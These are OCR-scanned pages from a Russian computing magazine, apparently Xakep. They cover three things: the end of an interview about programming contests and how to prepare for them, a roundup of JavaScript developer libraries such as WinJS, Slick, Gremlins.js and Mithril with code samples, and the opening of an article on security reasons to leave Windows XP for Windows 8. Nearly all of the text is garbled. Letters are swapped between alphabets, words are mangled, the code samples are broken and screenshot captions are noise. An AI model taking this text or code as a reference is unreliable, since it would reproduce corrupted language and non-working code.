не о тех, кто непосредственно участвовал в сост^зании. Поәтому такие соревнова- 
ни^ и провод^т обычно болвшие компании. 

Соревнованил со временем менлкггсл? Становлтсл сложнее или, наоборот, 
проиде? 

Они станов^тс^ сложнее. Все болвше алгоритмов считакзтс^ чем-то из разр^да «әто 
все должны уметв», «әто все знакзт». Думатв нужно столвко же, что и дес^тв лет на- 



зад. Шагов, чтооы построитв решение, понадооитс^ такое же количество, но оазовые 
блоки, из которых состоит решение, стали сложнее. Лкзди изучили болвше алгорит- 
мов. Вз^тв, например, суффиксное дерево: когда оно по^вилосв, ^ училс^ в школе, 
и казалосв, что әто оченв крутои алгоритм, все, кто его знает, оченв умные и зто во- 
обиде револкзии^. Сеичас те же задачи решакггс^ с помоидыо суффиксного автомата, 
а әто оченв простои алгоритм, которыи занимает дес^тв строк. То еств стандартные 
веши научилисв здорово упрошатв. Поәтому сеичас решакзт более сложные задачи. 

О ЗАДАЧАХ И ИХ СОСТАВЛЕНИИ 

Каксоставллкгг заданил длл соревновании? Еств составители, лкзди, которые 
уже умекзт зто делатв, или зто некии краудсорсинг, где каждыи может пред- 
ложитһ что-то свое? 

В упом^нутых еженеделвных соревновани^х именно так: каждыи может предпожитв 
свокз задачу. Но сушествует требование, чтобы человек до әтого поучаствовал в до- 
статочном числе соревновании. Своего рода проверка, понимает ли человек, о чем 
вообше должны бытв задачи. После можно отправл^тв свои задани^, и жкзри отве- 
тит, можно ли их исполвзоватв, подход^т ли они. Если задачи подход^шие, их потом 
дакзт на соревновани^х, а автору плат^т за әто денвги — не оченв болвшие, но все же. 

Придумыватв такие задачи — зто ведв особыи скилл? 

О да. Можно придумыватв задачи, отталкива^св от решении. Скажем, ты прочитал 
какукз-то статыо в научном журнале про интересныи алгоритм. Или просто нашел не- 
кии алгоритм и вспомнил, что ранвше с ним сталкивалс^, но в последнее врем^ дав- 
но его не видел. Можно придуматв задачу, котора^ требует его исполызовани^. 

Второи способ: когда в работе или в жизни возникает нека^ проблема, и ты пони- 
маешв, что ее можно круто исполызоваты Возможно, придетс^ что-то усложнитв или 
изменитв ограничени^, но потом получитс^ интересна^ задача дгт соревновани^. 

Авторы часто пытаготсл сделатв задачи ближе к реалвности, исполвзукгг тер- 
мины из жизни? 

Еств соревновани^ разнои степени приближенности кжизни. Обычно задача на со- 
ревновани^х даетс^ не в каких-то формалвныхтерминах, вроде «дано: решитвурав- 
нение такое-то». Обычно как раз даетс^ некии бәкграунд, истори^. Как в школвных 
учебниках по математике: «По однои трубе втекает дес^тв литров воды в минуту». 
Поәтому сначала нужно как-то формализоватв әту историкз, наити в неи математиче- 
скукз задачу, а уж потом решатв. 

Бывакзти другиесоревновани^.УТорСос!егәто называетс^ МагаШоп МаЈсһ, и дру- 
гие компании тоже провод^т подобные контесты. Они устроены немного иначе. Әто 
уже соревновани^ не по алгоритмам, а по решеникз приближенных задач. Когда нет 
точного решени^ и нужно придуматв вариант как можно лучше. Такие соревновани^ 
дгттс^ обычно две недели, мес^и,. Можно присылатв разные решени^ и наблкздатв, 
что, ага, вот сеичас мое решение лучше осталвных на 20%. 

«Лучше» — в смысле быстрее, исполвзует менвше памлти и так далее? 

Да. К примеру, нужно придуматв схему распределени^ движени^ автобусов по карте 
Москвы, чтобы исполызоватв как можно менвше автобусов. То еств в условии задачи 
еств некии параметр, которыи нужно оптимизироватв, но единого «верного реше- 



ни^» не суидествует, толвко какие-то приближенные алгоритмы. 

ТотжеТорСос!ег проводил соревновани^ вместе с ЫА5А, и они говор^т, что реше- 
ни^, которые им предложили, потом деиствителвно адаптировали и исполвзовали 
на МКС. Там решали какукз-то конкретнукз задачу, кажетс^, как поворачиватв солнеч- 
нукз батарекз, чтобы та получала болвше әнергии. 




С ЧЕГО НАЧАТВ 

Сточки зренил подготовки хорошего алгоритмического программиста и участ- 
ника разных контестов — как подготовитв себл к такому? Если представитв 
себл на месте старшеклассника или студентов первых курсов? 

Мне кажетс^, самыи стандартныи способ — әто попробоватв. У всех соревновании 
доступен архив проводившихс^ ранее контестов, там тыс^чи задач, которые можно 
порешатв в лкзбое врем^. 

А если л беру задачу и вообше не знак), с какои стороны к неи подоити? 

Значит, возвми попроиде. Они ведв разные. Ествзадачи, которые может решитв каж- 
дыи второи выпускник школы. Там совершенно разные уровни сложности. Вт^нутв- 
с^ должно бытв доволвно легко. Другого способа, как мне кажетс^, нет. Плкзс таким 
образом ты сразу поимешв, нравитс^ тебе зта де^телвноств или нет. 

Что нужно делатв, чтобы набратв алгоритмическук) базу? Врлд ли нужно прл- 



мо сразу кидатһсн читатв кнута. 

Мне кажетс^, начинатв нужно именносзадач. Уже потом, когдаты поимешв, что не мо- 
жешв решитв какукз-то конкретнукз из них, в зтих соревновани^х у каждои еств раз- 
бор. Можно прочитатв решение, если справитвс^ самосто^телвно не получаетс^. 
Например, в разборе указано, что в решении задачи исполвзуетс^ некии алгоритм. 
Можно почитатв, что әто за алгоритм, где еш,е он примен^етс^.Так лучше, чем читатв 
по списку «ага, у мен^ еств алгоритм, которыи мне нужно изучитв за лето». Лучше от- 
талкиватвс^ от конкретнои задачи, которукзты не смог решитв, потому что незнаешв 
какои-то конкретныи алгоритм. Әто более правилвно. Запоминаешв лучше, мотива- 
|ди^ получаетс^ силвнее. Такои способ изучени^ алгоритмов, наверное, долвше, чем 
по списку, но он приводит к лучшим резулвтатам. 

Если хочетсл «прокачатв» себл именно по алгоритмам, еств какал-то литера- 
тура, учебники? 

Самыи стандартныи учебник — Кормен, Леизерсон, Ривест с ослом на обложке. «Ал- 
горитмы: Построение и анализ» называетс^. Не знакз, п доволвно давно не училс^, 
сеичас наверн^ка еств новые учебники, которые могут бытв лучше. Но в мое вре- 
м^ исполвзовали Кормена. Кнут — әто, скорее, әтакии геТегепсе ооок. Если что-то 
нужно наити и оно нигде не находитс^, скорее всего, там оно будет. Но читатв Кнута 
подр^д... әто доволвно грустное зан^тие. 1К1 
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Шпе опсе, 

1оисһ_ 

еуөгушһеге 

ПОДБОРКА ПРИ^ТНЫХ ПОЛЕЗНОСТЕИ 
ДЛЛ РАЗРАБОТЧИКОВ 

Мы живем в прекрасном мире, где программисты не стес- 
нлкзтсл выкладыватһ различные вкусности в паблик — 
нужно лишһ знатһ, где их искаты Достаточно побро- 
дитһ по СЈШиһ и другим плош,адкам длл размеш,енил 
кода, и ты наидешһ решение длл лнобои проблемы. Даже 
длл тои, которои у тебл до әтого момента и не было. 




▼ 

Илвл Пестов 

@ј|уа рез1оу 



ОТшЈ8 



јгу.оиНсЫпјз.сот 

Веб-стандарты распростран^ктгс^ невообразимыми темпами. Среди всех програм- 
мистов болыие всего именно веб-разработчиков. Самыи попул^рныи ^зык про- 
граммировани^ сеичас ЈауаЗспр!. Средства разработки веб-проектов чрезвычаино 
востребованы, и зти стеки и ^зыки приход^т на замену «классическому» програм- 
мированикз. Тренд началс^ с разработки мобилвных приложении под ЈОЗ и Апс!гоЈс1 
с помоидыо НТМ1_, СЗЗ и Ј5. Позже была анонсирована веб-ориентированна^ мо- 
билвна^ операиионна^ система ҒЈгеТох 03, котора^ основана на браузерном движке 
Өеско. И конечно же, релиз \Л/Јпс!о\л/5 8 и инструментарии \Л/тЈ5 АР1 дп^ разработки 
\Л/Јп-приложени^ с помоидыо все техже НТМ1_5 и Јауа5спр1:. 

Сам \/\/ЈпЈ5 суидествует достаточно давно. Но 2 апрел^ 2014 года в МјсгозоТС пред- 
ставили әтотфреимворкеиде и как Ы-ориентированнукз библиотеку дгт кросс-плат- 
форменнои разработки без конкретнои прив^зки к ОС. Әто означает, что теперв 
каждыи разработчик, дела^ саит с \Л/јпЈ5, «автоматически» создает приложение 
дгт десктопных компыотеров, планшетов и телефонов. 
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уаг Ј1:етАггау = [ 

{ Ы±1е : "Магуе1ои5 МЈггс",, јех-Е: "беЈа^о", рјс1:иге: <-■ 

"/Јта§е5/-ҒгиЈ1:5/6ӨМЈп1:. рп§" }, 
{ 'ЕгЫе: "5исси1еп1: 51:гаы6еггу" , 'сехх: "Богһе - !:", <-■ 

рјс1:иге: "/Јт а§е5/ -ҒгиЈ1:5/6 Ө $1:гаыһеггу . рп§" }, 
{ 'сгЫе: "Вапапа 61351:", сехс: "1.ом--Ға1: -Ғгогеп уо§игс" Ј <-' 

рјстиг е: "Дта§е5/-ҒгиЈ1:5/6ӨВапапа . рп§ " }, 
{ ЫЫе: "1 _ауЈ5һ 1_етоп 1се" , сех с: "^огоес"., рп.с1:иге: <-■_ 

"/Јта§е5/-ҒгиЈ1:5/6Ө1етоп . рп§" }, 
{ ЫЫе: "Сгеату Огап^е", с ехс: "^огһес", рјссиге: <-■ 

"/Јта §е 5/-ҒгиЈ1:5/6Ө0гап§е. рп§" }, 
{ ЫЫе: "Уегу УапШа", техт : "1се Сгеат", рјссиге: <-> 

"/Јта§е5/-ҒгиЈ1:5/6ӨУапЈ11а. рп§" }, 
{ ЫЫе: "Вапапа ВЈаз^", 'сехт: "1.0У\/--Ға1: -Ғгогеп уоеигс",^ 

рјстиг е: "Дта§е5/-ҒгиЈ1:5/6ӨВапапа . рп§" }, 
{ ЫЫе: "1_ ауЈ5һ 1_етоп 1се", се хс: "^огһес"., рјссиге: <-■ 

"/Јта § е5/-Ғги Ј1:5/6Ө1етоп . рп§ " } 

1; 

уаг И:ет5 = [] ; 

// бепегасе 160 Јтет^ 

-Ғог (уаг ј = 0; ј < 20; ј++) { 

ЈсетАггау .-ҒогЕас һ(-ҒипсЫоп (Јтет) { 
Јтет5 . ри5һ(И:ет) ; 

}); 

} 

ЫЈп35.Мате5расе.с1е11пе("5атр1е. Ы^ сУЈем" { 



с1а1:а : пем 1л1 Јп35. ВјпсЈјп§. Из ^гЕетз) 

1л1Јп35.Ш .р госе55А11() ; 

С55 

/* Тетр1а1:е -Ғог 1:һе Ј1:ет5 Јп 1:һе 1_Ј51:УЈеы5 Јп 1:ҺЈ5 5атр1е */ 
. ^таШЛ^^сопТех^Ы^ет 

{ 

јл/МЫтј 100%; 
һеЈ§1 тЕ: 7Өрх; 
расШп§: 5р х; 
оуегИоы: һ±сЈс1еп ; 



. ^таНШ^^сопТех^Ы^ет 1т§. ^таНЈЛ^^сопТех^Е^ет-^та^е 
{ 

ыЈсЈ1:һ: бӨрх; 
һеЈ§1гЕ: бӨрх; 
таг§ј п: 5рх; 
Лоа*:1е-Ғ*; 
таг§1п-г1§1тЕ : 2Ө рх; 

Ј 

. 5та11 1-151:1 сопТе х1:11:ет . 5та1111511сопТех1:1£ет-0е1:аг1 

{ 

таг§1п: 5рх; 

1 

ЈД^^ауои^ЕТорНеасЈегТетр^а-ЕеКоо^^ 
-Ғо1гс-5Ј2е: 1аг§е г; 
таг§Јп-1е-Ғ1: : 16рх; 

1 

/* С55 аррПесЈ "со "сһе 1_Ј5-ЕУЈеы5 Јп "сһЈ5 5атр1е */ 
#1Ј5-сУЈем 

{ 

һеј§1 гс: 28Өрх; 

НТМ1. 

<!-- 5Јтр1е ^етр^а^Ее -Ғог ^сһе И^^сУЈеы Јп^^сагтсЈа^Јоп --> 

<сИу ЈсҺ^таПЕЈ^^ сопТех-ЕТ етр^а-Ее" (Ја^а-шЈп-соп-Его ^^ЫЈпЗ^. ВЈпсЈЈп%.Тетр1а1:е"<-' 
51:у1е="с1Ј 5р1ау : попе"> 
<сЈЈ у с1а5 5="5таШЈ51:1сопТех1:11:ет"> 

<1т§ 5гс= "#" с1а55="5таШЈ51:1сопТех1:11:ет-1та§е" с!а1:а-ыЈп -Ыпс1 ="5гс : <-■ 

рјссиге" /> 
<<ј ју с1а55="5таШЈ51:1сопТех1:11:ет-Ре1:аЈ1"> 
<Һ4 с!а1:а-ыЈп-Ыпс1="1:ех1:Соп1: еп1: : 1:Ј1:1е"> </һ4> 
<Һ6 с!а1:а-ыЈп-Ыпс1="1:ех1:Соп1: еп1: : 1:ех1:">< /һ6> 
</сЈју> 
</сЈју> 

< /гН \/^ 



<!-- Тһе с!ес1ага1:Јуе шагкир песезагу -Ғог Из^ЕУЈем Јпз^ап^ја^јоп --> 
<!-- Са11 1л1Јп35.Ш.ргосе55А11() Јп уоиг ЈпЈ^ЈаИга^Јоп сос!е --> 
<сИу Јс1 ="1Ј51:УЈеы" 

с!а55="ыЈп-5е1ес1:Јоп51:у1е^11ес1" 
(Ја1:а -ыЈп-соп1: го1="1 л1ЈпЗ$ .111 . Из^УЈем" 
(Ја1:а-ыЈп-ор1:Јоп5="{ 

И:ет0а1:а5оигсе : 5атр1е. И51:\/1еы.с1а1:а .сЈа^а^оигсе, 
И:етТетр1а1:е : 5та111151:1сопТех1:Тетр1а1:еЈ 



5е1ес1:10пМос1е: "попе". 



1:арВеһауЈо г: 'попе'. 



5ыЈреВеһауЈог : 'попе'. 



1ауои1:: { 1:уре: ЫЈпЈЗ .Ш . 115±ј ауои± } 
</(И у> 




Магуе1оиз Мт1 

ӨөШо 







Л 1 1*111 *Г- ] 1 Ш ш 


ит 

Зогое* 





Вапапа В1аз1 

1_0«-1а* Һогеп уодиП 



1_аүјзһ ^етоп 1се 
Зогое* 



Сгеату Огапае 




Тгасеиг СотрНег 



дЈ1һио.сот/доод1е/1гасеиг-сотрј1ег 
«Тгасеиг 15 а Јауа5спр1.пех1-1о-Јауа5сп'р1-о1-1ос!ау 
сотрИег». Собственно, в зтои фразе из описани^ кро- 
етс^ вс^ сутв. Современные возможности Јауа5спр1, 
суд^ по последним спеи,ификаи,и^м ЕСМА5сп"р1, впе- 
чатгткзт. Еств масса удобных методов: Аптлл/ ҒипсИопз, 
Өепега1огз, 11ега1огз апс! Ғог 01, Ргопгпзез и другие. 
Но работакзт они далеко не во всех браузерах, и парни 



из Өоод1е подарили нам зту утилиту, котора^ переве- 
дет код, написанныи по новым стандартам, в код, по- 
н^тныи и старым браузерам. Отныне весв потени,иал 
современного ЈауаЗспрх доступен всем и каждому. 

ЗМск.јз 



дЈШиһ.сот/кеп\л/һее1ег/з1Јск/ 

Единственныи скрипт, которыи необходим дл^ создани^ слаидера лкзбои слож- 
ности. Правда, осталвные не нужны. Во-первых, он оченв простои, оченв гибкии 
(Аи!ор1ау, сЈоЈз, агго\л/з, саИоаскз...) и оченв функи,ионалвныи (Ас!с1, геплоуе, Шег & 
ипШег зПсЈез...). Во-вторых, слаидеры получакзтс^ адаптивными, масштабирукзтс^ 
в зависимости от разрешени^ зкрана и реагирукзт на сваипы. В-третвих, он ум- 
ныи — когда можно, исполызуетс^ С533-анимаи,и^, когда нелыз^, то анимаии^ про- 
исходит на ЈауаЗспр!:. 



$( ' . 5Јп§1е-Ј1:ет' ) .5Пск(); 



Јкк 


:!к '!.Г1^ 1ЈЧНСЈН 'чРИШСјЈЧ П.4Ч II П[1Ж 










ҒШ1у гезропвјуе. 5са1е5 тО\ 1x5 сопсатег. 






5ерага1е аессЈпдЈ рег ГЈгеакрошг 






1)5^5 С^Ј шһеп ауаПаЫе. К»Ну ГипсЫопа! м/һеп по1. 






!>шре епаЫео!. ОгаЈЈаЫеа", И уои ргетег. 












1пгЈтте 1оортд. 






Ғи11у ассе55ЈЫе Шһ аггол кеу ламдаПоп 






Ааа\ гетоүе. г1кег & ипгИгсг 5Нс1е5 







СгетМп.јз 



дЈШиһ.сот/тагте1аһ/дгет1Јпз.јз 

Предвидетвабсолготно все полызователызкиеси,енарии невозможно. Также каки об- 
наружитв все ошибки или утечки пам^ти. Позтому команда Магпла1аоз разработала 
оченв нужныи в зтои ситуаи,ии дгеплИп.јз. Скрип змулирует деистви^ полызователеи. 
Иными словами, повскз-ду кликает, водит курсором, заполн^ет случаиным образом 
<±>оомы с иелыо вызватв ошибкү. 



Создаем орду (һогс1е) гремлинов: 



уаг һоггЈе = §гетНп5 , сгеа"сеНогс1е()^ 
һогс1е. ип1еа5һ( ) ; 

Наблкздаем за их деистви^ми в консоли браузера: 

§гетНп ^огтҒШе г Јп ри 1: 5 Јп <Јпри1: 1:уре="питрег" пате="а§е"> 

§гетНп ^огтҒШе г Јп ри1: р2с1оу25һһӨк9(д)о8ср5кс1һ73птЈ . г7г јп <Јпри1: 1:уре=<-" 

"етаН" пате="ета Ј1"> 

§гетНг^сНскег сИск а1: 1219 301 

§гетНп 5Сго11ег 5сго11 "со 100 25 




1 11Ө ГП 1өП АМ АСТЈҮӨ СОППр1өТеСЈ Ск>агсотр1еге<Ј {2) 




ШЛеп һү АсКЈуОвтаПЈ 
РагЈ о! ТогјоМУС 



ОһеИзк.јз 



дЈШио.сот/позЈг/ооеНзк.јз 



(Јченвзанимателына^ оиолиотека. Ч думакз, многие замечали, что в оети суидествует 
некии тренд на пикселвнукз графику — вз^твхот^ бы тотже Ғ1арру Вјгс!. Но во време- 
на «олдскула» насто^идего 30 не было, были толвко 20 изометрические проеки,ии, 
рисоватв которые с помоидыо современных средств в вебе доволвно муторно. Так 
вот, ОоеПзк — әто ЈауаЗспрЈ-движок, которыи как раз и облегчает построение изо- 
метрических обБектов на НТМ1_5 Сат/аз. 
Создадим первыи куб: 

// Создаем сапуаз 2Р роЈггс 

уаг роЈггс = пеы о оеП^к. Ројггс(2ӨӨј 2ӨӨ); 

уаг р Јхе!УЈе ы = пеы о ре!Ј5к. РЈхе1УЈеш(сапуа5Ј роЈггс) ; 

// Создаем әкземпллр куба и закрашиваем 

уаг с!Јтеп5Јо п = пеы оһе1Ј5к .СиреРЈтеп5Јоп(8ӨЈ 100, 120 ); 

уаг § гау = оое115к.Со1огРа"ссегп .СКАҮ; 

уаг со!ог = пеы оһе1Ј5к .СиоеСо1 ог( ) . §е"сВуНог120пса1Со1ог(§гау) ; 
// ВиИс! апс! гепс!ег сиое 

уаг с ире = пеы о ре1Ј5к.Сире(сЈЈтеп5ЈопЈСо1о гЈ сгие ) ; 
р1хе1\/1еы. гепс1егОһјес1:(сиһе) ; 




МНҺгИ 



дЈШио.сот/1һопе/тЈјһп1.ј5 

Миниаткзрныи МУС-фреимворк, спроектированныи с упором на производителв- 
ноств. Всего 3 Кб в дгјр, скороств загрузки в дес^тки раз, а скороств рендеринга 
в сотни раз выше, чем, например, у т^желовесного АпдЫаг. Из коробки предостав- 
л^ет достаточно обширныи функи,ионал дл^ построени^ клиентскои части веб-при- 
ложени^: структуру, роутинг и базовые методы работы с ООМ и данными. 



// пате^расе 



уаг арр = {}; 
// шос1е1 



арр. Ра§е1_151: = -Ғипс1:Јоп() { 



ге1:игп т. г едие51:({те1:һос1 : "бЕТ", иг1: "ра § е5. Ј50п "}); 



}; 



// согтЕгоПег 



арр . согтЕго Пег = -Ғипс1:Јоп() { 



1:ҺЈ5 . ра§е5^^арр. Ра§еИ51:(Х; 



// ујеы 

арр.ујеы = -Ғипс1:Јоп(с1:г1) { 



ге1:игп сЕг1. ра§е5( ) ,тар( -Ғипс1:Јоп( ра§е) { 



ге^и.гп т("а", {Һге-Ғ: ра^е.иг!}, ра§ е."ЕгЫе) ; 



}; 



}); 



// ЈпЈ-ЕЈаПге 

т.тос1и1е(с1оситеп1: .§е1:Е1етеп1:Ву1с1("ехатр1е") , арр) ; 



®МПҺгИ 



ӨикЈө АР1 СоттипИу Оотп1оас1 (ЗШто 



А Јауа&спр! һгатемгк 1ог Ышшто ышһат АррһсаЈкзпз 



ОчтпЈожЈ уО.1.3 



• Оп1у Зко дгјрреи, по сЈөрөпсЈепсЈез • Баһз-оу-сЈеГаиП 1ет!р1а1ез • УЈг1иа1 ООМ сШпд апс! сотрПаЫе 1етр1а1ез 

• 8та1 АР1, зтан 1еагптд сип/е . тегагсшса! МҮС ^ја сотропетз . тшшдет ашо-геагампд зуз1ет 



5атр1е соАе 



<ФР РадаЈ-ге* Ғсјпс-Ыоп 

ге£игп т геоЈиеБ* №*һо() иг! 



арр сигһгоИсг ГипсһгопС/ 
*һг.^ рпдс;; арр Радс1Л 



арр үгего Ги-гс.Ло-1 с1г! ' 

ге1.игл с1г! радез тарТипсЧсг раде 

геиитј тС" 1 һгеГ раде иг! раде (ЛО. 



арр 




т поиШе Оосипепг детЕ1ешепгВу1сГ 



Г3е11тд 31а11ес1 » 

□оситоп:а::сп >• 



СНВоок 



аироок.1о 

Весвма привлекателвныи инструмент дл^ создани^ документаи,ии. К клкочевым пре- 
имуидествам ӨИВоок можно отнести то, что он оченв простои в исполвзовании, все 
происходит с помоидыо Магкс!о\л/п и на выходе получаетс^ грамотно оформленныи 
резулвтат. 

// Структура документа 

# Титулвныи лист 
КЕАРМЕ.ггкЈ 

# Описание структуры 
51ЈММАКҮ.тс1 

јгтс го/ 

# Введение к вступителвнои части 
КЕАРМЕ. шс! 

# Первал странијда 
Дг51:-р а§е . тсЈ^ 

# Вторал странијда 
весопс1-ра§е.тс1 



// Сборка 

$^И:һоок һиПс! . /^- -§И:һиһ=Ре51:оү/Хакер --1:Ј1:1е="Заголовок" 
// где Ре51:оу и Хакер - логин и репозитории на 6Ј1:Нир 



ВЛП С11Воок 
М ► ] [Лј [&} |ЛЈ [>ј ( + И0 «жи.д.Пмпк.И) 






1 о 


• Х|к>р »01(2014) Ил - Кирр«т>* - Аии «јдһрок - Пвмл ■ Соон1г 






шаа 


СИБоок 








ВиИсЈ һеаи^Ғи! рго§гаттЈп§ боокз апс1 


■ 






ехегс15Ө5 и$јп§ бКНиб/СИ: әпс! Магкоошп. 


■ 







Ноүу Ш 1Ј5е № 



Ип5(а11 \1 изт^: 
1 лрт т^оП дНһппк -д 

АпгЈ гот/ег1 упмг гғ-ром[пгу и-^т^: 



Но1с1ег.ј8 



Јтзку.дЈШио.Јо/һоЈсЈег 

Достаточно часто по^вл^етс^ необходимоств в шаблонном изображении, чтобы 
представитв, как будет выгттдетв блок в том или ином месте. Конечно, можно ис- 
полвзоватв реалвные картинки-заглушки или отделвные <с!гУ>'ы-плеисхолдеры, 
но и тот и другои подход потребует лишних телодвижении. Первыи — открыватв 
графическии редактор, а второи — писатв дополнителвныи С55, которыи потом все 
равно исполвзоватвс^ не будет. Наиболее удобным решением будет миниаткзрна^ 
библиотека Но1с!ег, котора^ генерирует на клиенте изображение произволвного раз- 
мера с помоидыо 5УӨ и Сат/аз. 



// 35 

<5сгјр1: 5гс="һо1с!ег. Ј5"х /5сгјр1:> 
<5сгјр 1:> 

// Еств разные дефолтные темы (5ку,, ујпе, 1ауа., %гау } 
II ЈпсЈи51:гЈа1) и возможноств создаватһ свои 
Но^ег.а^Јсһете^ргЈ^Һ-г :"., { һ аск§гоипсЈ: "мһј-се", 
Јоге§гоипсЈ: "§гау"., 5Јге: 12 }) 

</5СГЈр1:> 

// НТМХ 

<1т§ сЈа1:а-5гс="һо1с1 ег. Ј5/2ӨӨх20Ө/1:ех1:: һеИо ыог1сЈ"> 
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НЫгЈәг 1Е?гкЗәг& шакјв г^сеһокгӘГЕ 
вгтивһг" оп 1гч* с*чн1| 1мЈе. 

II ммосҮ^ 1зо1һ огАг* алгЈ огМпө, алгЈ 
л Ы~л!паҺ4|=1 АР1 1о Му1в дпг! 



С№пп1оа<1 Но1(Јөг,[8 (бКВ) 



'-18« вгс- *һо1"1<1г. 1в ""3 ООкЗОО" 

"ЛА№ ЛПП|тАП1л1|АП Л11ПА: 

ноиег ј! иинив радо. 
Сло-"")"!^ 

МаОи һу 1тап Ма1ор1п«у. 



РС 20ЫЕ 



Переход на 




\Л/1пао\л/5" 8 

ДЈОЖИНА АРГУМЕНТОВ 
ИЗ ОБЛАСТИ БЕЗОПАСНОСТИ 



Когда в 2001 году МЈсгозоИ выпустила ХР, мы сомнөва- 
лисһ, удастс^ ли поставитһ өө на комп с 566 МГи, и 128 
Мб ОЗУ, или всө-таки надо 256? А нө лучшө ли вообш,ө 
512 Мб РАМ? Но вөдһ опөративка в тө врөмөна была 
очөнв дорога! Да и нужна ли наслөднииа \Л/ЈпЫТ на дө- 
сктопө? Нө прош,ө ли остатһс^ на \Л/јп98? :) 



К)рии «уигешһо» Лзев 

уигетро@һо1таЈ1.сот 



Годы расставили все по местам. Мегагериы превратилисв в гигагериы, по^ви- 
лисв много^дерные проиессоры, мегабаиты оперативы превратилисв в ги- 
габаиты, а гигабаиты на винте — в терабаиты... Мобилвник в твоем кармане 
мутировал из черно-белои звонилки в здоровенныи смартфон, по вычисли- 
телвнои моидности в разы превосход^идии ПК начала двухтыс^чных... 

Тринадиатвлет — огромныи периоддгт мираИ. Изменилисвтехнологии, неспали 
вирмеикеры. Малварв силвно усовершенствоваласв, по^вилисв новые виды и спо- 
собы атак, и уже бесполезно накладыватв дес^тки и сотни патчеи — основа системы 
\Л/Јпс!о\л/5ХР остаетс^ прежнеи. Такчто благоразумнее всего переити на совершенныи 
фундамент — новукз версикз операиионнои системы \ЛЛпс!о\л/5. Мы насчитали как ми- 
нимум двенадиатв (а если считатв безопасное облако ОпеОгме, то и все тринадиатв) 
аргументов в полвзу перехода с\Л/јпс!о\л/5 ХР на 8/8.1 с обновлением. 




1п1егпе* 
Ехр1огег 11 



ШШ ПРЕКРАШ.ЕНИЕ ПОДДЕРЖКИ 

Сама^ главна^ причинапереходитһс\Л/тс!о\л/5ХР насовременнукз версик)\Л/Јпс!о\л/5 за- 
клкзчаетс^ в том, что 8 апрел^ МЈсгобоТТ прекратила бесплатнукз поддержку зтои опе- 
раи,ионнои системы. Таким образом, компани^ перестанет выпускатв дгт\Л/Јпс!о\л/5ХР 
патчи и обновлени^, в том числе критические обновлени^ безопасности. Особо кон- 
сервативные клиенты смогут получатв обновлени^ за плату. Т^желое, но обоснован- 
ное решение — никакие патчи не сделакзт устаревшукз платформу соответствукзидеи 
современным реали^м. 

ШШ РИСК ЗАРАЖЕНИ^ ХР: ВЫШЕ В ШЕСТҺ РАЗ 

МЈсго5оТ1: подчеркивает: из-за устаревшего фундамента \Л/јпс!о\л/5 ХР возможноств 
заражени^ компыотера под ее управлением в шеств раз выше, чем компыотера 
под управлением современнои операиионнои системы \Л/јпс!о\л/5 8/8.1. Әти сведе- 
ни^ были получены корпораииеи МЈсгобоТТ с помоидыо собственных продуктов, та- 
ких как МаПсЈои5 ЗоТглл/аге Ретоуа! Тоо1, Ехсһапде ОпИпе, \Л/тс!о\л/5 ОеТепс!ег. Из от- 
чета по безопасности следует, что дев^тв компыотеров из тыс^чи под управлением 
\Л/Јпс!о\л/5ХР заражены вредоносным программным обеспечением итолвко два — под 
управлением \Л/Јпс!о\л/5 8. 
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РАСТУШ.ЕЕ КОЛИЧЕСТВО У^ЗВИМОСТЕИ 



По данным датскои исследователызкои компании Зесигма, в 2013 году в \Л/Јпс!о\л/5 ХР 
обнаружено в два раза болыие у^звимостеи, чем в 2012-м. То еств в 2012-м было 
наидено 49 дыр, тогда как в 2013-м аж 99! Отскзда следует, что дыру можно наити 
в лкзбом софте, как бы хорошо он ни был заидииден, и чем долвше жизненныи и,икл 
әтого софта, тем болвшее количество дыр в нем обнаруживакзт, несмотр^ на их ско- 
реишее латание. 

ШШ СТАРЫЕ ВЕРСИИ 1Е ПОД УГРОЗОИ 

Лввина^ дол^ у^звимостеи приходитс^ на старые версии браузеров, исполызуемых 
вдоживакзидеисвои векопераи,ионноисистеме. В 1п1:егпе1:Ехр1огег 11 вместес\Л/Јпс!о\л/5 
8.1 дела с безопасностыо обсто^т гораздо лучше. Например, он вклкзчает техноло- 
гикз 5плаг1:5сгееп, ограждакзидукз полызовател^ от потени,иалвно опасного контен- 
та. «Умныи әкран» позвол^ет сделатв веб-серфинг более надежным и безопасным, 
предотврашди открытие опасных ссылок как на веб-странииах, так и в сообидени^х 
әлектроннои почты. Таким образом, 5плаг1:5сгееп вклкзчает антифишинговукз зашиту, 
средство ои,енки репутаи,ии приложении и заидиту от вредоносных программ. 

Дополнителвно 1п1егпе1: Ехр1огег 11 вклкзчаеттак называемыи режим предпри^ти^, 
с его помоидыо останетс^ полна^ совместимоств с приложени^ми, разработанными 
дгт старых версии 1Е. Как известно, именно из-за болвшого количества унаследо- 
ванного программного обеспечени^ предпри^ти^ с неохотои переход^т на новые 
версии программных систем. Но, переид^ на 1Е11, бизнес-полызователи не толвко 
сохран^т работоспособноств старых веб-приложении (благодар^ режиму предпри- 
^ти^), но и получат поддержку современных веб-стандартов, производителвноств 
и безопасноств. 

П ЗА ДОЛГИЕ ГОДЫ \МЫ00\Л/5 ХР ДОСКОНАЛҺНО ИЗУЧЕНА ХАКЕРАМИ 
Как ты думаешв, почему наш Александр Әккерт так лкзбит писатв про у^звимо- 
сти \Л/Јпс!о\л/5 ХР и так мало освеидает тему хака современных систем от МЈсго5о1т.? 
По секрету говор^, он сам сидит на \Л/тс!о\л/5 ХР под администратором без антиви- 
руса и периодически, вооружившисв отладчиком и дизассемблером, гон^ет оттуда 
малварв :). Но главна^ причина не в зтом. \Л/Јпс!о\л/5 ХР — стара^ операиионна^ си- 
стема, и хакеры успели прекрасно изучитв ее системы зашиты. К примеру, впер- 
вые по^вившиис^ во втором сервис-паке механизм ОЕР (Оа1:а Ехеси1:Јоп РгеуепИоп), 
предотвраидакзидии выполнение кода в области пам^ти, помеченнои толвко 
дп^ чтени^, уже широко исполызуетс^ дгт взлома и нанесени^ вреда системе. 
В \Л/Јпс!о\л/5 8 встроены новые механизмы заидиты, которые пока неизвестны взлом- 
идикам. 

ШШ ВЫШЕ РИСК ПОПАСТҺ В БОТНЕТ 

Из предыдуидего пункта вытекает, что компыотеры с \Л/Јпс!о\л/5 ХР на борту болыие 
осталвных подвержены риску бытв вовлеченными в ботнеты. Рассылатв спам по сво- 
ему интернет-каналу или маинитв биткоины дгт чужого д^ди удоволызтви^ мало, по- 
әтому имеет смысл обновитв систему. 

ШШ БЕСПЛАТНЫИ АНТИВИРУС В \Л/1Ы00\Л/5 8 

В отличие от \ЛЛпс!о\л/5 ХР, восвмерка вклкзчает полнои,енныи антивирус \ЛЛпс!о\л/5 

